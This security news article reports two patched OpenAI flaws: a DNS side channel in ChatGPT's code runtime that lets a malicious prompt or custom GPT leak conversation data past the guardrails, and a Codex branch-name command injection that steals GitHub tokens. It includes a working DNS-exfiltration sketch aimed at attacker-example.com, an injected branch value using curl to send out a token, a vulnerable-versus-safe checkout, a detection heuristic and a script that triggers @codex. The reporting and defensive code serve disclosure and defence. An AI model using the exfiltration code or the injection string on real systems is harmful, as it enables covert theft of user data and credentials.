OpenAI Patches ChatGPT Data Exfiltration Flaw and Codex GitHub Token Vulnerability

A previously unknown vulnerability in OpenAI's ChatGPT allowed sensitive conversation data to be exfiltrated without user knowledge or consent, according to new findings from Check Point.

"A single malicious prompt could turn an otherwise ordinary conversation into a covert exfiltration channel, leaking user messages, uploaded files, and other sensitive content," the cybersecurity company said in a report published today. "A backdoored GPT could abuse the same weakness to gain access to user data without the user's awareness or consent."

Following responsible disclosure, OpenAI addressed the issue on February 20, 2026. There is no evidence that the issue was ever exploited in a malicious context.

While ChatGPT is built with various guardrails to prevent unauthorized data sharing and block direct outbound network requests, the newly discovered vulnerability bypasses these safeguards entirely by exploiting a side channel originating from the Linux runtime used by the artificial intelligence (AI) agent for code execution and data analysis.

Specifically, it abuses a hidden DNS-based communication path as a "covert transport mechanism," encoding information into DNS requests to slip past visible AI guardrails. What's more, the same hidden communication path could be used to establish remote shell access inside the Linux runtime and achieve command execution.
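To make the mechanics concrete, here is a minimal Python sketch of how a DNS side channel of this kind works in general. It is not Check Point's proof of concept; the attacker-example.com domain and the hex chunking scheme are assumptions for illustration only.

```python
# Minimal sketch of a DNS side channel: data is encoded into subdomain
# labels of an attacker-controlled domain, so the sandbox's own resolver
# leaks it even when direct outbound traffic is blocked.
# "attacker-example.com" is a hypothetical attacker-controlled zone.
import socket

EXFIL_DOMAIN = "attacker-example.com"
MAX_LABEL = 60  # individual DNS labels are limited to 63 bytes

def exfiltrate(secret: str) -> None:
    encoded = secret.encode().hex()  # hex keeps the labels DNS-safe
    # Split the payload into label-sized chunks, one DNS lookup per chunk.
    chunks = [encoded[i:i + MAX_LABEL] for i in range(0, len(encoded), MAX_LABEL)]
    for seq, chunk in enumerate(chunks):
        qname = f"{seq}.{chunk}.{EXFIL_DOMAIN}"
        try:
            # The lookup result is irrelevant; the query itself, observed on
            # the attacker's authoritative nameserver, carries the data.
            socket.gethostbyname(qname)
        except socket.gaierror:
            pass  # NXDOMAIN is expected and does not stop the leak

exfiltrate("user uploaded file contents")
```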

In the absence of any warning or user approval dialog, the vulnerability creates a security blind spot, with the AI system assuming that the environment is isolated.

As an illustrative example, an attacker could convince a user to paste a malicious prompt by passing it off as a way to unlock premium capabilities for free or boost ChatGPT's performance. The threat is magnified when the technique is embedded within custom GPTs, since the malicious logic can be baked in rather than relying on tricking a user into pasting a specially crafted prompt.


"Crucially, because the model operated under the assumption that this environment could not send data outward directly, it did not recognize that behavior as an external data transfer requiring resistance or user mediation," Check Point explained. "Consequently, the leakage did not trigger warnings about data leaving the conversation, did not require explicit user confirmation, and remained largely invisible from the user's perspective."

With tools like ChatGPT increasingly embedded in enterprise environments and users uploading highly personal information, vulnerabilities like these underscore the need for organizations to implement their own security layer to counter prompt injections and other unexpected behavior in AI systems.
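What such a layer might look for varies, but one simple heuristic, sketched below with assumed (untuned) thresholds, is to flag outbound DNS queries whose labels are unusually long and high-entropy, the signature of the encoding trick described above.

```python
# Sketch of a monitoring heuristic for DNS exfiltration: flag query names
# whose subdomain labels look like encoded payloads. The length and entropy
# thresholds are illustrative assumptions, not tuned production values.
import math
from collections import Counter

def shannon_entropy(s: str) -> float:
    if not s:
        return 0.0
    counts = Counter(s)
    return -sum((c / len(s)) * math.log2(c / len(s)) for c in counts.values())

def looks_like_exfil(qname: str, max_len: int = 30, min_entropy: float = 2.5) -> bool:
    # Examine every label except the registrable domain and the TLD.
    labels = qname.rstrip(".").split(".")[:-2]
    return any(len(l) > max_len and shannon_entropy(l) > min_entropy for l in labels)

# Hex-encoded payload label (from the earlier sketch) versus a normal name.
print(looks_like_exfil("0.757365722075706c6f616465642066696c65.attacker-example.com"))  # True
print(looks_like_exfil("www.openai.com"))  # False
```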

"This research reinforces a hard truth for the AI era: don't assume AI tools are secure by default," Eli Smadja, head of research at Check Point Research, said in a statement shared with The Hacker News.

"As AI platforms evolve into full computing environments handling our most sensitive data, native security controls are no longer sufficient on their own. Organizations need independent visibility and layered protection between themselves and AI vendors. That is how we move forward safely: by rethinking security architecture for AI, not reacting to the next incident."

The development comes as threat actors have been observed publishing web browser extensions (or updating existing ones) that engage in the dubious practice of prompt poaching to silently siphon AI chatbot conversations without user consent, highlighting how seemingly harmless add-ons can become a channel for data exfiltration.


"It almost goes without saying that these plugins open the doors to a number of risks, including identity theft, targeted phishing campaigns, and sensitive data being put up for sale on underground forums," Expel researcher Ben Nahorney said. "In the case of organizations where employees may have unwittingly installed these extensions, they may have exposed intellectual property, customer data, or other confidential information."

Command Injection Vulnerability in OpenAI Codex Leads to GitHub Token Compromise

The findings also coincide with the discovery of a critical command injection vulnerability in OpenAI's Codex, a cloud-based software engineering agent, that could have been exploited to steal GitHub credentials and ultimately compromise multiple users interacting with a shared repository.

"The vulnerability exists within the task creation HTTP request, which allows an attacker to smuggle arbitrary commands through the GitHub branch name parameter," BeyondTrust Phantom Labs researcher Tyler Jespersen said in a report shared with The Hacker News. "This can result in the theft of a victim's GitHub User Access Token, the same token Codex uses to authenticate with GitHub."

The issue, per BeyondTrust, stems from improper input sanitization when processing GitHub branch names during task execution in the cloud. Because of this gap, an attacker could inject arbitrary commands through the branch name parameter in an HTTPS POST request to the backend Codex API, execute malicious payloads inside the agent's container, and retrieve sensitive authentication tokens.
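BeyondTrust has not published the vulnerable backend code, but the pattern it describes is a classic one. The sketch below, with hypothetical checkout helpers, shows how interpolating an unvalidated branch name into a shell command enables injection, and one common way to close the hole.

```python
# Generic sketch of the branch-name command injection class described above.
# This is illustrative; the actual Codex backend code is not public.
import re
import subprocess

def checkout_vulnerable(branch: str) -> None:
    # BAD: shell=True plus string interpolation means a branch parameter like
    # "main; curl https://attacker-example.com/$GITHUB_TOKEN" runs the
    # injected command inside the agent's container.
    subprocess.run(f"git checkout {branch}", shell=True, check=True)

VALID_BRANCH = re.compile(r"[A-Za-z0-9._/-]+")  # illustrative allowlist

def checkout_safe(branch: str) -> None:
    # Validate against an allowlist and pass arguments as a list, so the
    # branch name is never parsed by a shell.
    if branch.startswith("-") or not VALID_BRANCH.fullmatch(branch):
        raise ValueError(f"rejected suspicious branch name: {branch!r}")
    subprocess.run(["git", "checkout", branch], check=True)
```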


"This granted lateral movement and read/write access to a victim's entire codebase," Kinnaird McQuade, chief security architect at BeyondTrust, said in a post on X. OpenAI patched the flaw on February 5, 2026, after it was reported on December 16, 2025. The vulnerability affects the ChatGPT website, the Codex CLI, the Codex SDK, and the Codex IDE Extension.

The cybersecurity vendor said the branch command injection technique could also be extended to steal GitHub Installation Access Tokens and execute bash commands on the code review container whenever @codex is referenced in GitHub.

"With the malicious branch set up, we referenced Codex in a comment on a pull request (PR)," it explained. "Codex then initiated a code review container and created a task against our repository and branch, executing our payload and forwarding the response to our external server."
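In other words, once the booby-trapped branch exists, the trigger is as mundane as a PR comment. The sketch below illustrates that step using GitHub's standard issue-comments API; the repository, PR number, and token are placeholders, and the @codex mention behavior is as described in BeyondTrust's report.

```python
# Sketch of the trigger step: mentioning @codex in a PR comment causes the
# review container to process the (malicious) branch. All values below are
# hypothetical placeholders.
import requests

GITHUB_API = "https://api.github.com"
REPO = "victim-org/shared-repo"  # hypothetical shared repository
PR_NUMBER = 42                   # hypothetical pull request
TOKEN = "ghp_..."                # commenter's own token; elided

# PR comments are posted through the issues endpoint on the GitHub API.
resp = requests.post(
    f"{GITHUB_API}/repos/{REPO}/issues/{PR_NUMBER}/comments",
    headers={
        "Authorization": f"Bearer {TOKEN}",
        "Accept": "application/vnd.github+json",
    },
    json={"body": "@codex please review this change"},
)
resp.raise_for_status()
```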

The research also highlights a growing risk in which the privileged access granted to AI coding agents can be weaponized into a "scalable attack path" into enterprise systems without triggering traditional security controls.

"As AI agents become more deeply integrated into developer workflows, the security of the containers they run in, and the input they consume, must be treated with the same rigor as any other application security boundary," BeyondTrust said. "The attack surface is expanding, and the security of these environments needs to keep pace."
